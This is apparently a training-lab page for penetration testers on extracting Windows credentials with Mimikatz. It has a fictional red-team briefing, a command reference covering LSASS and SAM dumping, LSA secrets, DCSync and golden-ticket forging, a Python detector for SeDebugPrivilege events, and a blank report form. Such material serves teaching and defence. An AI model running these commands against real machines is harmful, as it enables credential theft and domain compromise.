MIMIKATZ
CYBERSEC LAB — VIRTUAL PENETRATION TESTING
MODULE 12 — CREDENTIAL EXTRACTION FROM MEMORY

🐱 ASSIGNMENT GOALS

Launch Mimikatz and enable SeDebugPrivilege.
Run sekurlsa::logonpasswords to extract credentials from LSASS.
Run lsadump::sam to dump the SAM database hashes.
Run lsadump::secrets to extract LSA secrets.
Run kerberos::list to enumerate Kerberos tickets.
Complete the pentest report and submit.
📋 BRIEFING
⚠ CLASSIFIED — RED TEAM OPERATION

MISSION BRIEFING

Operation: Cat Burglar  |  Tool: Mimikatz 2.2.0
SCENARIO
You have SYSTEM-level access to an Apex Systems Windows Server 2019 machine (APEX-SRV-02) obtained during the previous engagement phase.

Your objective is to use Mimikatz to extract credentials directly from Windows memory — cleartext passwords, NTLM hashes, and Kerberos tickets stored in the LSASS process.

These credentials can be used for lateral movement across the domain, Pass-the-Hash attacks, and Kerberoasting. Document all findings in the pentest report.
OBJECTIVES
1. Launch mimikatz.exe and run privilege::debug to enable SeDebugPrivilege.
2. Run sekurlsa::logonpasswords — extract NTLM hashes and cleartext passwords from LSASS memory.
3. Run lsadump::sam — dump the SAM database of local account hashes.
4. Run lsadump::secrets — extract LSA secrets including service account credentials.
5. Run kerberos::list — enumerate Kerberos tickets stored in memory.
6. Fill out the Pentest Report and submit.
TOOLS
Terminal (Windows CMD): mimikatz.exe — already on target at C:\Tools\mimikatz.exe
Reference Manual: Mimikatz module reference, credential types, attack paths
Pentest Report: Document and submit your credential extraction findings
TARGET
APEX-SRV-02 — 192.168.1.100 — Windows Server 2019 — Running as SYSTEM
C:\WINDOWS\SYSTEM32\CMD.EXE — APEX-SRV-02
Microsoft Windows [Version 10.0.17763.5576]
(c) 2018 Microsoft Corporation. All rights reserved.
 
Current user: NT AUTHORITY\SYSTEM
Mimikatz is available at: C:\Tools\mimikatz.exe
Type 'help' for available commands.
 
C:\Tools>
REFERENCE MANUAL — MIMIKATZ
WHAT IS MIMIKATZ?
Mimikatz is a post-exploitation tool that extracts credentials from Windows memory. It reads directly from the LSASS (Local Security Authority Subsystem Service) process, which stores authentication data for all logged-on users.
LAUNCH & PRIVILEGE
mimikatz.exe — launch mimikatz
mimikatz — (if in PATH)

privilege::debug — enable SeDebugPrivilege (REQUIRED before any extraction)
token::elevate — impersonate SYSTEM token
CREDENTIAL EXTRACTION (sekurlsa)
sekurlsa::logonpasswords — dump ALL credentials from LSASS (main command)
sekurlsa::wdigest — WDigest cleartext only
sekurlsa::msv — NTLM hashes only
sekurlsa::kerberos — Kerberos credentials
sekurlsa::tspkg — TS/PKG credentials
sekurlsa::livessp — LiveSSP credentials
SAM & LSA DUMPING (lsadump)
lsadump::sam — dump SAM database (local account hashes)
lsadump::secrets — dump LSA secrets (svc accounts, cached)
lsadump::cache — cached domain logons
lsadump::dcsync /user:Administrator — DCSync attack (DA needed)
KERBEROS ATTACKS
kerberos::list — list tickets in memory
kerberos::list /export — export .kirbi files
kerberos::ptt ticket.kirbi — Pass-the-Ticket
kerberos::golden — create golden ticket
    /user:Administrator
    /domain:APEXCORP.LOCAL
    /sid:S-1-5-21-...
    /krbtgt:[NTLM hash]
    /ticket:golden.kirbi
CREDENTIAL TYPES EXPLAINED
TYPE            DESCRIPTION                     USE CASE
NTLM Hash       Hashed Windows password         Pass-the-Hash, cracking
Cleartext       Plaintext password in memory    Direct login, reuse
Kerberos TGT    Ticket Granting Ticket          Pass-the-Ticket
LSA Secret      Service/scheduled task creds    Lateral movement
Cached Creds    Domain creds cached locally     Offline cracking
EXPORT & MISC
log output.txt — log all output to file
exit — quit mimikatz
version — show mimikatz version
cls — clear screen
WHY PRIVILEGE::DEBUG?
SeDebugPrivilege allows a process to read/write memory of any other process, including LSASS. Without it, Mimikatz cannot access LSASS memory. This privilege is only available to Administrators and SYSTEM accounts.
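A defender-side check for the privilege adjustment described above, as an added example that is not part of the original lab: it scans Windows Security event 4703 ("A token right was adjusted") records for SeDebugPrivilege being enabled by a process outside an allowlist. The JSON-lines export format, the allowlist contents and the sample records are assumptions constructed for illustration, and the check only works where auditing that produces event 4703 is enabled.

```python
import json

TARGET_PRIVILEGE = "SeDebugPrivilege"

# Assumption: processes expected to enable the privilege on this host.
# Build the real list from a baseline of your own environment.
EXPECTED_PROCESSES = {
    r"c:\windows\system32\lsass.exe",
    r"c:\windows\system32\svchost.exe",
}

# Constructed sample records (invented values), one JSON object per line,
# using field names from Security event 4703.
SAMPLE_EVENTS = r"""
{"EventID": 4703, "ProcessName": "C:\\Windows\\System32\\svchost.exe", "SubjectUserName": "SYSTEM", "EnabledPrivilegeList": "SeDebugPrivilege"}
{"EventID": 4703, "ProcessName": "C:\\Tools\\mimikatz.exe", "SubjectUserName": "SYSTEM", "EnabledPrivilegeList": "SeDebugPrivilege"}
{"EventID": 4703, "ProcessName": "C:\\Users\\Public\\svchost.exe", "SubjectUserName": "SYSTEM", "EnabledPrivilegeList": "SeBackupPrivilege\n\t\t\tSeDebugPrivilege"}
{"EventID": 4703, "ProcessName": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", "SubjectUserName": "SYSTEM", "EnabledPrivilegeList": "SeBackupPrivilege"}
{"EventID": 4624, "ProcessName": "-", "SubjectUserName": "SYSTEM"}
truncated-record
"""


def find_debug_privilege_events(lines, expected=EXPECTED_PROCESSES):
    """Return 4703 events where an unexpected process enabled SeDebugPrivilege."""
    alerts = []
    for line in lines:
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue  # blank or malformed line: skip, do not abort the scan
        if not isinstance(event, dict) or event.get("EventID") != 4703:
            continue
        # The privilege list is whitespace-separated, one name per entry.
        enabled = str(event.get("EnabledPrivilegeList", "")).split()
        process = str(event.get("ProcessName", ""))
        # Compare the full path, so a familiar file name in an unusual
        # directory is still reported.
        if TARGET_PRIVILEGE in enabled and process.lower() not in expected:
            alerts.append((process, event.get("SubjectUserName", "")))
    return alerts


if __name__ == "__main__":
    for process, user in find_debug_privilege_events(SAMPLE_EVENTS.splitlines()):
        print(f"{TARGET_PRIVILEGE} enabled by {process} (user {user})")
```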
PENTEST REPORT — MIMIKATZ FINDINGS

CREDENTIAL EXTRACTION FINDINGS REPORT

APEX SYSTEMS INC. — RED TEAM ENGAGEMENT — COMPLETE ALL FIELDS

SECTION 1 — EXTRACTION METHOD
SECTION 2 — CLEARTEXT CREDENTIALS
SECTION 3 — HASH EXTRACTION
SECTION 4 — ATTACK PATHS IDENTIFIED
SECTION 5 — RISK & REMEDIATION